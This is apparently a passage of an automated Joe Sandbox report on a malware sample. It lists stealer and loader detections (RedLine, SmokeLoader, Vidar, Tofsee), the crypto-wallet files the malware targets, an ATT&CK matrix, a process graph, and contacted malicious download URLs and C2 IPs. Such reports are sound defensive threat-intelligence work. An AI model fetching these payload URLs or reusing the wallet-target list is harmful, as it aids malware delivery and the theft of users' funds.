Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
Source: svchost.exe, 00000008.00000002.554711794.0000026C8DE3D000.00000004.00000001.sdmp | Binary or memory string: "@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000008.00000002.557118584.0000026C8DF02000.00000004.00000001.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information:

Yara detected RedLine Stealer
Source: Yara match | File source: 27.2.B217.exe.3fb6f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.B217.exe.3fb6f20.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.B217.exe.3e7ada0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.B217.exe.405ba90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.B217.exe.405ba90.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.B217.exe.3e7ada0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001B.00000002.479069139.0000000003E01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.481840914.0000000004005000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.480913132.0000000003F71000.00000004.00000001.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match | File source: 20.1.A019.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.1.rcvfbte.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.A019.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.A019.exe.6c15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rcvfbte.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.ZA3cYU28Yl.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.ZA3cYU28Yl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.ZA3cYU28Yl.exe.5715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.ZA3cYU28Yl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.ZA3cYU28Yl.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.rcvfbte.5f15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.ZA3cYU28Yl.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.333262137.00000000005B1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.333204148.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.327467083.0000000005AC1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.407171768.00000000005C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.385289105.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.407257194.00000000005E1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.385864770.0000000002441000.00000004.00020000.sdmp, type: MEMORY
Yara detected Vidar stealer
Source: Yara match | File source: 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 9779.exe PID: 2228, type: MEMORYSTR
Yara detected Tofsee
Source: Yara match | File source: 26.3.A881.exe.7f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.A881.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.A881.exe.6c0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.A881.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001A.00000002.443373510.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.443196839.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000003.404265838.00000000007F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: A881.exe PID: 7004, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmp | String found in binary or memory: \Electrum\wallets\
Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmp | String found in binary or memory: \ElectronCash\wallets\
Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmp | String found in binary or memory: \Electrum\wallets\
Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmp | String found in binary or memory: window-state.json
Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmp | String found in binary or memory: \jaxx\Local Storage\
Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmp | String found in binary or memory: exodus.conf.json
Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmp | String found in binary or memory: \Exodus\exodus.wallet\
Source: 9779.exe, 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmp | String found in binary or memory: info.seco
Source: 9779.exe, 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmp | String found in binary or memory: ElectrumLTC
Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmp | String found in binary or memory: \jaxx\Local Storage\
Source: 9779.exe, 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmp | String found in binary or memory: passphrase.json
Source: 9779.exe, 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmp | String found in binary or memory: \Ethereum\
Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmp | String found in binary or memory: \Exodus\exodus.wallet\
Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmp | String found in binary or memory: file__0.localstorage
Source: 9779.exe, 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmp | String found in binary or memory: Ethereum
Source: 9779.exe, 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmp | String found in binary or memory: default_wallet
Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmp | String found in binary or memory: multidoge.wallet
Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmp | String found in binary or memory: \Exodus\exodus.wallet\
Source: 9779.exe, 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmp | String found in binary or memory: seed.seco
Source: 9779.exe, 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmp | String found in binary or memory: keystore
Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmp | String found in binary or memory: \Electrum-LTC\wallets\
Source: Yara match | File source: 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 9779.exe PID: 2228, type: MEMORYSTR

                      Remote Access Functionality:

Yara detected RedLine Stealer
Source: Yara match | File source: 27.2.B217.exe.3fb6f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.B217.exe.3fb6f20.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.B217.exe.3e7ada0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.B217.exe.405ba90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.B217.exe.405ba90.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.B217.exe.3e7ada0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001B.00000002.479069139.0000000003E01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.481840914.0000000004005000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.480913132.0000000003F71000.00000004.00000001.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match | File source: 20.1.A019.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.1.rcvfbte.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.A019.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.A019.exe.6c15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rcvfbte.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.ZA3cYU28Yl.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.ZA3cYU28Yl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.ZA3cYU28Yl.exe.5715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.ZA3cYU28Yl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.ZA3cYU28Yl.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.rcvfbte.5f15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.ZA3cYU28Yl.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.333262137.00000000005B1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.333204148.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.327467083.0000000005AC1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.407171768.00000000005C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.385289105.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.407257194.00000000005E1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.385864770.0000000002441000.00000004.00020000.sdmp, type: MEMORY
Yara detected Vidar stealer
Source: Yara match | File source: 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 9779.exe PID: 2228, type: MEMORYSTR
Yara detected Tofsee
Source: Yara match | File source: 26.3.A881.exe.7f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.A881.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.A881.exe.6c0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.A881.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001A.00000002.443373510.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.443196839.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000003.404265838.00000000007F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: A881.exe PID: 7004, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\A881.exe | Code function: 26_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

                      Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts (1) | Windows Management Instrumentation (1) | DLL Side-Loading (1) | DLL Side-Loading (1) | Disable or Modify Tools (111) | Input Capture (1) | System Time Discovery (2) | Remote Services | Archive Collected Data (11) | Exfiltration Over Other Network Medium | Ingress Tool Transfer (14) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API (531) | Valid Accounts (1) | Valid Accounts (1) | Deobfuscate/Decode Files or Information (11) | LSASS Memory | Account Discovery (1) | Remote Desktop Protocol | Data from Local System (1) | Exfiltration Over Bluetooth | Encrypted Channel (22) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Shared Modules (1) | Windows Service (4) | Access Token Manipulation (1) | Obfuscated Files or Information (3) | Security Account Manager | File and Directory Discovery (2) | SMB/Windows Admin Shares | Input Capture (1) | Automated Exfiltration | Non-Standard Port (1) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Exploitation for Client Execution (1) | Logon Script (Mac) | Windows Service (4) | Software Packing (43) | NTDS | System Information Discovery (227) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol (4) | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Command and Scripting Interpreter (3) | Network Logon Script | Process Injection (613) | Timestomp (1) | LSA Secrets | Query Registry (1) | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol (25) | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Service Execution (3) | Rc.common | Rc.common | DLL Side-Loading (1) | Cached Domain Credentials | Security Software Discovery (571) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | File Deletion (1) | DCSync | Process Discovery (2) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Masquerading (31) | Proc Filesystem | Virtualization/Sandbox Evasion (231) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Valid Accounts (1) | /etc/passwd and /etc/shadow | Application Window Discovery (1) | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Access Token Manipulation (1) | Network Sniffing | System Owner/User Discovery (1) | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Virtualization/Sandbox Evasion (231) | Input Capture | Remote System Discovery (1) | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Process Injection (613) | Keylogging | Local Groups | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | | | Inhibit System Recovery
Compromise Hardware Supply Chain | Visual Basic | Scheduled Task | Scheduled Task | Hidden Files and Directories (1) | GUI Input Capture | Domain Groups | Exploitation of Remote Services | Email Collection | Commonly Used Port | Proxy | | | Defacement

                      Behavior Graph

Behavior Graph ID: 553399 | Sample: ZA3cYU28Yl.exe | Startdate: 14/01/2022 | Architecture: WINDOWS | Score: 100

Start (node 2)
• DNS/IP: transfer.sh; host-data-coin-11.com; cdn.discordapp.com
• Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; 15 other signatures
• Started: ZA3cYU28Yl.exe (node 11); rcvfbte (node 14); svchost.exe (node 16); 9 other processes (node 18)

ZA3cYU28Yl.exe (node 11)
• Signatures: Contains functionality to inject code into remote processes; Injects a PE file into a foreign processes
• Started: ZA3cYU28Yl.exe (node 20)

rcvfbte (node 14)
• Signatures: Machine Learning detection for dropped file
• Started: rcvfbte (node 23)

svchost.exe (node 16)
• Signatures: Changes security center settings (notifications, updates, antivirus, firewall)
• Started: MpCmdRun.exe (node 25)

9 other processes (node 18)
• Started: WerFault.exe (node 27)

ZA3cYU28Yl.exe (node 20)
• Signatures: Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration)
• Injected: explorer.exe 12 (node 29)

rcvfbte (node 23)
• Signatures: Creates a thread in another existing process (thread injection)

MpCmdRun.exe (node 25)
• Started: conhost.exe (node 34)

explorer.exe 12 (node 29)
• DNS/IP: 185.233.81.115, 443, 49770 SUPERSERVERSDATACENTERRU Russian Federation; 188.166.28.199, 80 DIGITALOCEAN-ASNUS Netherlands; 12 other IPs or domains
• Dropped: C:\Users\user\AppData\Roaming\rcvfbte, PE32; C:\Users\user\AppData\Local\Temp\B217.exe, PE32; C:\Users\user\AppData\Local\Temp\A881.exe, PE32; 14 other malicious files
• Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Deletes itself after installation; Hides that the sample has been downloaded from the Internet (zone.identifier)
• Started: 9779.exe (node 36); A019.exe (node 39); A881.exe 2 (node 41); 2 other processes (node 44)

9779.exe (node 36)
• Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Found evasive API chain (may stop execution after checking mutex); 4 other signatures

A019.exe (node 39)
• Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
• Started: A019.exe (node 46)

A881.exe 2 (node 41)
• Dropped: C:\Users\user\AppData\Local\...\lnagngtg.exe, PE32
• Started: cmd.exe (node 49); cmd.exe (node 52); sc.exe (node 54)

2 other processes (node 44)
• Signatures: Antivirus detection for dropped file; Sample uses process hollowing technique
• Started: WerFault.exe 3 10 (node 56); B217.exe (node 58)

A019.exe (node 46)
• Signatures: Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration); Creates a thread in another existing process (thread injection)

cmd.exe (node 49)
• Dropped: C:\Windows\SysWOW64\...\lnagngtg.exe (copy), PE32
• Started: conhost.exe (node 60)

cmd.exe (node 52)
• Started: conhost.exe (node 62)

sc.exe (node 54)
• Started: conhost.exe (node 64)

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
ZA3cYU28Yl.exe | 100% | Joe Sandbox ML |

                      Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\72B9.exe | 100% | Avira | HEUR/AGEN.1212012
C:\Users\user\AppData\Local\Temp\B217.exe | 100% | Avira | HEUR/AGEN.1211353
C:\Users\user\AppData\Local\Temp\2EE4.exe | 100% | Avira | HEUR/AGEN.1212012
C:\Users\user\AppData\Local\Temp\9779.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\7F9A.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\A881.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\8ECE.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\9460.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\rcvfbte | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\293.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\41A3.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\3657.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\48E7.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\969F.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\B217.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\A019.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\lnagngtg.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\50E7.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\293.exe | 34% | Metadefender |
C:\Users\user\AppData\Local\Temp\293.exe | 77% | ReversingLabs | Win32.Ransomware.StopCrypt
C:\Users\user\AppData\Local\Temp\48E7.exe | 34% | Metadefender |
C:\Users\user\AppData\Local\Temp\48E7.exe | 77% | ReversingLabs | Win32.Ransomware.StopCrypt
C:\Users\user\AppData\Local\Temp\50E7.exe | 50% | ReversingLabs | Win32.Infostealer.Generic
C:\Users\user\AppData\Local\Temp\9460.exe | 46% | Metadefender |
C:\Users\user\AppData\Local\Temp\9460.exe | 77% | ReversingLabs | Win32.Trojan.Raccoon
C:\Users\user\AppData\Local\Temp\969F.exe | 35% | ReversingLabs | ByteCode-MSIL.Trojan.Pwsx
C:\Users\user\AppData\Local\Temp\A019.exe | 47% | ReversingLabs | Win32.Trojan.Generic

                      Unpacked PE Files

Source | Detection | Scanner | Label
27.0.B217.exe.a90000.3.unpack | 100% | Avira | HEUR/AGEN.1211353
3.0.ZA3cYU28Yl.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1123244
15.0.rcvfbte.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
20.1.A019.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
20.0.A019.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
16.2.9460.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
17.2.A019.exe.6c15a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
26.3.A881.exe.7f0000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
26.2.A881.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
22.2.9779.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
16.2.9460.exe.480e50.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
22.3.9779.exe.7f0000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
42.0.B217.exe.1b0000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
15.0.rcvfbte.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
3.0.ZA3cYU28Yl.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1123244
15.0.rcvfbte.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
42.0.B217.exe.1b0000.2.unpack | 100% | Avira | HEUR/AGEN.1211353
15.1.rcvfbte.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
16.0.9460.exe.480e50.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
27.0.B217.exe.a90000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
20.2.A019.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.2.ZA3cYU28Yl.exe.5715a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
26.2.A881.exe.6c0e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
16.0.9460.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
42.0.B217.exe.1b0000.3.unpack | 100% | Avira | HEUR/AGEN.1211353
15.2.rcvfbte.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
3.0.ZA3cYU28Yl.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
16.0.9460.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
3.1.ZA3cYU28Yl.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
42.2.B217.exe.1b0000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
3.2.ZA3cYU28Yl.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
3.0.ZA3cYU28Yl.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1123244
3.0.ZA3cYU28Yl.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
16.3.9460.exe.5f0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
20.0.A019.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
27.0.B217.exe.a90000.2.unpack | 100% | Avira | HEUR/AGEN.1211353
14.2.rcvfbte.5f15a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
42.0.B217.exe.1b0000.1.unpack | 100% | Avira | HEUR/AGEN.1211353
20.0.A019.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
3.0.ZA3cYU28Yl.exe.400000.3.unpack | 100% | Avira | HEUR/AGEN.1123244
27.2.B217.exe.a90000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
27.0.B217.exe.a90000.1.unpack | 100% | Avira | HEUR/AGEN.1211353
22.2.9779.exe.7d0e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
3.0.ZA3cYU28Yl.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
16.0.9460.exe.480e50.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
http://81.163.30.181/l2.exe | 100% | Avira URL Cloud | malware
http://185.7.214.171:8080/6.php | 100% | URL Reputation | malware
http://host-data-coin-11.com/ | 0% | URL Reputation | safe
http://data-host-coin-8.com/files/6961_1642089187_2359.exe | 17% | Virustotal |
http://data-host-coin-8.com/files/6961_1642089187_2359.exe | 100% | Avira URL Cloud | malware
http://data-host-coin-8.com/game.exe | 0% | URL Reputation | safe
https://www.disneyplus.com/legal/your-california-privacy-rights | 0% | URL Reputation | safe
https://api.ip.sb/ip | 0% | URL Reputation | safe
http://unicupload.top/install5.exe | 100% | URL Reputation | phishing
http://74.201.28.62/book/KB5009812.png | 0% | Avira URL Cloud | safe
http://privacy-tools-for-you-780.com/downloads/toolspab3.exe | 100% | Avira URL Cloud | malware
https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe
https://activity.windows.comr | 0% | URL Reputation | safe
http://74.201.28.62/book/KB5009812.exe | 0% | Avira URL Cloud | safe
https://%s.xboxlive.com | 0% | URL Reputation | safe
https://www.disneyplus.com/legal/privacy-policy | 0% | URL Reputation | safe
http://data-host-coin-8.com/files/7729_1642101604_1835.exe | 100% | Avira URL Cloud | malware
http://data-host-coin-8.com/files/9030_1641816409_7037.exe | 100% | Avira URL Cloud | malware
https://dynamic.t | 0% | URL Reputation | safe
https://disneyplus.com/legal. | 0% | URL Reputation | safe
http://help.disneyplus.com. | 0% | URL Reputation | safe
http://81.163.30.181/l3.exe | 100% | Avira URL Cloud | malware
https://%s.dnet.xboxlive.com | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
unicupload.top | 54.38.220.85 | true | false | | high
host-data-coin-11.com | 8.209.70.0 | true | false | | high
cdn.discordapp.com | 162.159.129.233 | true | false | | high
privacy-tools-for-you-780.com | 8.209.70.0 | true | false | | high
goo.su | 104.21.38.221 | true | false | | high
transfer.sh | 144.76.136.153 | true | false | | high
data-host-coin-8.com | 8.209.70.0 | true | false | | high

                                    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://81.163.30.181/l2.exe | true | Avira URL Cloud: malware | unknown
http://185.7.214.171:8080/6.php | true | URL Reputation: malware | unknown
http://host-data-coin-11.com/ | false | URL Reputation: safe | unknown
http://data-host-coin-8.com/files/6961_1642089187_2359.exe | true | Virustotal: 17%; Avira URL Cloud: malware | unknown
http://data-host-coin-8.com/game.exe | false | URL Reputation: safe | unknown
http://unicupload.top/install5.exe | true | URL Reputation: phishing | unknown
http://74.201.28.62/book/KB5009812.png | true | Avira URL Cloud: safe | unknown
http://privacy-tools-for-you-780.com/downloads/toolspab3.exe | true | Avira URL Cloud: malware | unknown
http://74.201.28.62/book/KB5009812.exe | true | Avira URL Cloud: safe | unknown
http://data-host-coin-8.com/files/7729_1642101604_1835.exe | true | Avira URL Cloud: malware | unknown
http://data-host-coin-8.com/files/9030_1641816409_7037.exe | true | Avira URL Cloud: malware | unknown
http://81.163.30.181/l3.exe | true | Avira URL Cloud: malware | unknown

                                    URLs from Memory and Binaries


                                                                                                        Contacted IPs


                                                                                                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
188.166.28.199 | unknown | Netherlands | 14061 | DIGITALOCEAN-ASNUS | true
74.201.28.62 | unknown | United States | 35913 | DEDIPATH-LLCUS | true
8.209.70.0 | host-data-coin-11.com | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false
54.38.220.85 | unicupload.top | France | 16276 | OVHFR | false
104.21.38.221 | goo.su | United States | 13335 | CLOUDFLARENETUS | false
144.76.136.153 | transfer.sh | Germany | 24940 | HETZNER-ASDE | false
81.163.30.181 | unknown | Russian Federation | 58303 | IR-RASANAPISHTAZIR | false
185.233.81.115 | unknown | Russian Federation | 50113 | SUPERSERVERSDATACENTERRU | true
185.7.214.171 | unknown | France | 42652 | DELUNETDE | true
162.159.129.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | false
185.186.142.166 | unknown | Russian Federation | 204490 | ASKONTELRU | true

                                                                                                        Private

IP: 192.168.2.1

                                                                                                        General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 553399
Start date: 14.01.2022
Start time: 20:21:27
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 15m 3s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: ZA3cYU28Yl.exe
Cookbook file name: default.jbs
